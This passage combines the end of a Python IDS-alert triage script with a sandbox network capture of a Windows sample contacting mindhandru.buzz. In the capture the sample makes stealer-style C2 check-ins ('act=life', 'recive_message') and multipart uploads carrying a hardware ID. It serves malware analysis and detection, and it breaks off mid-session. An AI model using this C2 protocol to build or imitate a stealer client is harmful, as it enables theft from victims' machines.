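            out.append((flow, sorted({a["sid"] for a in hard}), delay))
    return sorted(out, key=lambda e: e[0][1])   # by client port


def sid_counts(alerts):
    """How often each SID fired; useful for spotting the noisy fingerprint rule."""
    return Counter(a["sid"] for a in alerts)


if __name__ == "__main__":
    parsed = parse_fast_log(SAMPLE_LOG)
    for flow, sids, delay in escalated_flows(parsed):
        print(f"{flow[0]}:{flow[1]} -> {flow[2]}:{flow[3]} escalated to {sids} after {delay:.3f}s")
```

Run against the constructed log it reports client ports 49712, 49718, 49742 and 49749 as escalated, each within about a second of the JA3 match, and leaves 49724, 49730, 49736 and 49760 as fingerprint-only. In production the same grouping is simpler on EVE JSON (the `flow_id` field replaces the 4-tuple), but the escalation logic is identical.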
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 09:01:53.208939075 CET | 49712 | 443 | 192.168.2.9 | 104.21.11.101
Dec 27, 2024 09:01:53.209048986 CET | 443 | 49712 | 104.21.11.101 | 192.168.2.9
Dec 27, 2024 09:01:53.209148884 CET | 49712 | 443 | 192.168.2.9 | 104.21.11.101
Dec 27, 2024 09:01:53.212138891 CET | 49712 | 443 | 192.168.2.9 | 104.21.11.101
Dec 27, 2024 09:01:53.212171078 CET | 443 | 49712 | 104.21.11.101 | 192.168.2.9
Dec 27, 2024 09:01:54.542413950 CET | 443 | 49712 | 104.21.11.101 | 192.168.2.9
Dec 27, 2024 09:01:54.542493105 CET | 49712 | 443 | 192.168.2.9 | 104.21.11.101
Dec 27, 2024 09:01:54.545589924 CET | 49712 | 443 | 192.168.2.9 | 104.21.11.101
Dec 27, 2024 09:01:54.545625925 CET | 443 | 49712 | 104.21.11.101 | 192.168.2.9
Dec 27, 2024 09:01:54.545897007 CET | 443 | 49712 | 104.21.11.101 | 192.168.2.9
Dec 27, 2024 09:01:54.593400955 CET | 49712 | 443 | 192.168.2.9 | 104.21.11.101
Dec 27, 2024 09:01:54.593482971 CET | 49712 | 443 | 192.168.2.9 | 104.21.11.101
Dec 27, 2024 09:01:54.593518972 CET | 49712 | 443 | 192.168.2.9 | 104.21.11.101
Dec 27, 2024 09:01:54.593657017 CET | 443 | 49712 | 104.21.11.101 | 192.168.2.9
Dec 27, 2024 09:01:55.271605968 CET | 443 | 49712 | 104.21.11.101 | 192.168.2.9
Dec 27, 2024 09:01:55.271733046 CET | 443 | 49712 | 104.21.11.101 | 192.168.2.9
Dec 27, 2024 09:01:55.271825075 CET | 49712 | 443 | 192.168.2.9 | 104.21.11.101
Dec 27, 2024 09:01:55.293381929 CET | 49712 | 443 | 192.168.2.9 | 104.21.11.101
Dec 27, 2024 09:01:55.293409109 CET | 443 | 49712 | 104.21.11.101 | 192.168.2.9
Dec 27, 2024 09:01:55.301342964 CET | 49718 | 443 | 192.168.2.9 | 104.21.11.101
Dec 27, 2024 09:01:55.301398993 CET | 443 | 49718 | 104.21.11.101 | 192.168.2.9
Dec 27, 2024 09:01:55.301470041 CET | 49718 | 443 | 192.168.2.9 | 104.21.11.101
Dec 27, 2024 09:01:55.301731110 CET | 49718 | 443 | 192.168.2.9 | 104.21.11.101
Dec 27, 2024 09:01:55.301742077 CET | 443 | 49718 | 104.21.11.101 | 192.168.2.9
Dec 27, 2024 09:01:56.513437986 CET | 443 | 49718 | 104.21.11.101 | 192.168.2.9
Dec 27, 2024 09:01:56.513603926 CET | 49718 | 443 | 192.168.2.9 | 104.21.11.101
Dec 27, 2024 09:01:56.528724909 CET | 49718 | 443 | 192.168.2.9 | 104.21.11.101
Dec 27, 2024 09:01:56.528768063 CET | 443 | 49718 | 104.21.11.101 | 192.168.2.9
Dec 27, 2024 09:01:56.529145002 CET | 443 | 49718 | 104.21.11.101 | 192.168.2.9
Dec 27, 2024 09:01:56.535629988 CET | 49718 | 443 | 192.168.2.9 | 104.21.11.101
Dec 27, 2024 09:01:56.535659075 CET | 49718 | 443 | 192.168.2.9 | 104.21.11.101
Dec 27, 2024 09:01:56.535753965 CET | 443 | 49718 | 104.21.11.101 | 192.168.2.9
Dec 27, 2024 09:01:57.379746914 CET | 443 | 49718 | 104.21.11.101 | 192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.379807949 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.379839897 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.379863024 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.379877090 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.379910946 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.379919052 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.379973888 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.380004883 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.380009890 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.388005018 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.388051987 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.388057947 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.396303892 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.396354914 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.396365881 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.437135935 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.437145948 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.484040022 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.499336004 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.546513081 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.571564913 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.575481892 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.575525999 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.575550079 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.575567007 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.575606108 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.575615883 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.575691938 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.575735092 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.575855970 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.575867891 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.575880051 CET49718443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.575886965 CET44349718104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.755786896 CET49724443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.755841017 CET44349724104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:57.755991936 CET49724443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.756303072 CET49724443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:57.756314039 CET44349724104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:59.055078030 CET44349724104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:59.055244923 CET49724443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:59.087526083 CET49724443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:59.087563992 CET44349724104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:59.088212967 CET44349724104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:59.089349031 CET49724443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:59.089519978 CET49724443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:59.089560986 CET44349724104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:59.995136976 CET44349724104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:59.995258093 CET44349724104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:01:59.995322943 CET49724443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:59.995620012 CET49724443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:01:59.995642900 CET44349724104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:00.137840986 CET49730443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:00.137893915 CET44349730104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:00.138004065 CET49730443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:00.138341904 CET49730443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:00.138359070 CET44349730104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:01.352343082 CET44349730104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:01.352479935 CET49730443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:01.354206085 CET49730443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:01.354212046 CET44349730104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:01.354495049 CET44349730104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:01.355830908 CET49730443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:01.359347105 CET49730443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:01.359396935 CET44349730104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:01.359462023 CET49730443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:01.407334089 CET44349730104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:02.225608110 CET44349730104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:02.225733995 CET44349730104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:02.225799084 CET49730443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:02.241777897 CET49730443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:02.241812944 CET44349730104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:02.478156090 CET49736443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:02.478200912 CET44349736104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:02.478266001 CET49736443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:02.478806973 CET49736443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:02.478822947 CET44349736104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:03.785567045 CET44349736104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:03.785692930 CET49736443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:03.787058115 CET49736443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:03.787070036 CET44349736104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:03.787302971 CET44349736104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:03.788923979 CET49736443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:03.789052010 CET49736443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:03.789083958 CET44349736104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:03.789148092 CET49736443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:03.789156914 CET44349736104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:04.784077883 CET44349736104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:04.784185886 CET44349736104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:04.784243107 CET49736443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:04.784446001 CET49736443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:04.784462929 CET44349736104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:05.383850098 CET49742443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:05.383907080 CET44349742104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:05.383976936 CET49742443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:05.384370089 CET49742443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:05.384387970 CET44349742104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:06.687932968 CET44349742104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:06.688004971 CET49742443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:06.689275980 CET49742443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:06.689290047 CET44349742104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:06.689533949 CET44349742104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:06.690680981 CET49742443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:06.690774918 CET49742443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:06.690781116 CET44349742104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:07.587187052 CET44349742104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:07.587284088 CET44349742104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:07.587356091 CET49742443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:07.587652922 CET49742443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:07.587668896 CET44349742104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:08.171426058 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:08.171472073 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:08.171538115 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:08.172004938 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:08.172019005 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.428596020 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.428663015 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.429961920 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.429972887 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.430212975 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.431435108 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.432209015 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.432255030 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.432389975 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.432419062 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.432543993 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.432574034 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.433487892 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.433527946 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.433657885 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.433692932 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.433851004 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.433886051 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.433898926 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.433906078 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.434041023 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.434067965 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.434092999 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.434254885 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.434283972 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.479329109 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.479558945 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.479598999 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.479625940 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.479640961 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.479660034 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.479669094 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.479722977 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.479738951 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:12.119383097 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:12.119489908 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:12.119566917 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:12.119826078 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:12.119874001 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:12.155530930 CET49760443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:12.155575991 CET44349760104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:12.155636072 CET49760443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:12.156181097 CET49760443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:12.156193972 CET44349760104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:12.999874115 CET49760443192.168.2.9104.21.11.101
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 09:01:53.064291954 CET | 63225 | 53 | 192.168.2.9 | 1.1.1.1
Dec 27, 2024 09:01:53.203809977 CET | 53 | 63225 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 27, 2024 09:01:53.064291954 CET | 192.168.2.9 | 1.1.1.1 | 0xd109 | Standard query (0) | mindhandru.buzz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 27, 2024 09:01:49.723926067 CET | 1.1.1.1 | 192.168.2.9 | 0x757a | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 09:01:49.723926067 CET | 1.1.1.1 | 192.168.2.9 | 0x757a | No error (0) | s-part-0035.t-0009.t-msedge.net |  | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:01:53.203809977 CET | 1.1.1.1 | 192.168.2.9 | 0xd109 | No error (0) | mindhandru.buzz |  | 104.21.11.101 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:01:53.203809977 CET | 1.1.1.1 | 192.168.2.9 | 0xd109 | No error (0) | mindhandru.buzz |  | 172.67.165.185 | A (IP address) | IN (0x0001) | false
• mindhandru.buzz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49712 | 104.21.11.101 | 443 | 3784 | C:\Users\user\Desktop\onaUtwpiyq.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 08:01:54 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: mindhandru.buzz
2024-12-27 08:01:54 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-27 08:01:55 UTC | 1119 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 08:01:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=a1q63skk8iui8n1q6ctspd1523; expires=Tue, 22 Apr 2025 01:48:34 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qAPvDES51DP3YdkCrQYo4zVqTglfo7e%2FCiDUDIY9KWKJmUVzkX%2ByuQ4OmUdKhdwYmemJleiPW33BBso5B8rBh1VdocdrZg0lZn2lPTqHRVNJxNbUXmBu1aZvcckxsLaLnIw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87c90d9cb07ca6-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1811&min_rtt=1811&rtt_var=905&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4214&recv_bytes=906&delivery_rate=45155&cwnd=236&unsent_bytes=0&cid=7e50b77aec6ab1a5&ts=804&x=0"
2024-12-27 08:01:55 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-27 08:01:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49718 | 104.21.11.101 | 443 | 3784 | C:\Users\user\Desktop\onaUtwpiyq.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 08:01:56 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 47
Host: mindhandru.buzz
2024-12-27 08:01:56 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-27 08:01:57 UTC | 1135 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 08:01:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=rhn18o91dg3acjtqn28p7f4kb4; expires=Tue, 22 Apr 2025 01:48:36 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nvK7TCjY2df7l97yv9ZJ9wPm%2BYA47V9j97jxK%2BLT8qZH3b%2Bv%2Bj1smcvQGG7jj3Zi0Flz4YgU8KvhSNOwNn0QCbXNdcQFCiWubeORg7J%2FYH6%2FYNQhe1p%2B4%2B3rC%2BWPKenzHvI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87c91b5e3342b7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1722&min_rtt=1707&rtt_var=651&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=946&delivery_rate=1710603&cwnd=212&unsent_bytes=0&cid=a0373df714f3f0eb&ts=872&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49724 | 104.21.11.101 | 443 | 3784 | C:\Users\user\Desktop\onaUtwpiyq.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 08:01:59 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=DYUBSUUYZEJ58FRNYT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12845
Host: mindhandru.buzz
2024-12-27 08:01:59 UTC | 12845 | OUT | Data Raw: 2d 2d 44 59 55 42 53 55 55 59 5a 45 4a 35 38 46 52 4e 59 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 30 34 34 42 45 31 34 42 31 39 34 42 46 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 44 59 55 42 53 55 55 59 5a 45 4a 35 38 46 52 4e 59 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 59 55 42 53 55 55 59 5a 45 4a 35 38 46 52 4e 59 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
Data Ascii: --DYUBSUUYZEJ58FRNYTContent-Disposition: form-data; name="hwid"5A044BE14B194BFCBEBA0C6A975F1733--DYUBSUUYZEJ58FRNYTContent-Disposition: form-data; name="pid"2--DYUBSUUYZEJ58FRNYTContent-Disposition: form-data; name="lid"PsFKDg--pablo
2024-12-27 08:01:59 UTC | 1133 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 08:01:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=qaupc28mi6v28f8g2uvu72kgs2; expires=Tue, 22 Apr 2025 01:48:38 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X5sGsGbJDBXVQZE9XF20tOYGap6Vq5%2Bf6Bn0SiGcBxVi%2FG%2F%2Bsdw5MysGTDMQShKmjH1AJpJUg%2FjPkUep9nzGYIzO5GJtNVtSwqHvFs3cVPIKSVilcBhyKJHwPL5L8p%2FHEPA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87c9296d994262-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1742&min_rtt=1738&rtt_var=661&sent=13&recv=16&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13784&delivery_rate=1644144&cwnd=190&unsent_bytes=0&cid=cb68e84d1fcac4e6&ts=945&x=0"
2024-12-27 08:01:59 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-27 08:01:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.949730104.21.11.1014433784C:\Users\user\Desktop\onaUtwpiyq.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-27 08:02:01 UTC274OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=29GKX58PQGN
